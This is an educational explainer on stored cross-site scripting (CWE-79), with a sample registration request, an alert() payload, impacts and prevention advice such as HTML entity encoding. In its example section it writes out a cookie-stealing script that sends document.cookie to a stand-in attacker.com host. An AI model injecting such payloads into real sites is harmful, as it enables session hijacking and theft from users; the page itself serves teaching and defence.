Cross-site Scripting (XSS) - Stored (CWE-79)

Description

Stored XSS is very similar to Reflected XSS. The only difference is in Stored XSS; malicious javascript will be stored in the database, and whenever users access that webpage, malicious javascript will be get executed.

Once, Malicious code is injected, even if victim access that website from different devices, at different time, Still, Server will again send Malicious Code, as it is stored in Database.

Example

Let's see the example.

website site.com has registration form, which takes Name, email , password as input. On submit button click, the browser will send a request, as shown below.

POST /register.php HTTP/1.1
Host: site.com

name=rahul&uemail=rahul@gmail.com&password=mySecret

And after successful registration, the website is showing, welcome msg as, Welcome, Rahul !

Som here, all details name, email, password are stored in Database, and the website is fetched those details and shows on a webpage.

Now, an attacker can send malicious javascript into the registration form, which will also get stored into the Database and get reflected onto the webpage.

e.g., Attacker may enter name as rahul<script>alert('This is Stoted XSS')</script>

So, whenever user login, Server will fetch name from Database, which contains malicious javascript. That javascript will be sent to the user and executed in the user's browser.

Javascript given in the above example is not malicious but, an attacker can execute malicious code, like

<script type="text/javascript">
document.location='http://attacker.com/cookiestealer.php?c='+document.cookie;
</script>

This malicious code will steal cookes from vitim.

This is a simple example of Stored XSS. Generally, websites will have XSS Protections, and the attacker has to bypass those restrictions. WAF(Web Application Firewall) provides XSS Protection, but the attacker can bypass WAF by analyzing the working of the application and constructing complicated payload.

Impact

  • As malicious code is stored, It has more impact than Reflected XSS.
  • Single XSS Attack can affect the number of users(which is generally not possible with reflected XSS)
  • Malicious javascript can be executed in a victim's browser, which can read anything on that page, can modify that webpage (client-side).
  • If the victim is a highly privileged user (Like admin), it may cause full website compromise.
  • JavaScript can be used to send XHR (XMLHttpRequest) with any content to any server.
  • An attacker might send cookies to the attacker's Server and hijack the session.
  • XSS can be used to bypass CSRT-Token.

Prevention

  • Never Trust user, Validate user input strictly as per expected input.
  • Use HTML Entity Encoding
    • Output generated based on user input should be encoded before putting into html webpage, so that it will not cosidered as active content by web broweser.
    • HTML encoding will convert &, <, >, ", ' into &amp;, &lt;, &gt;, &quot;, &#x27; &#x2F;,
  • Use HTTP response header Content-Type and X-Content-Type-Options

Tools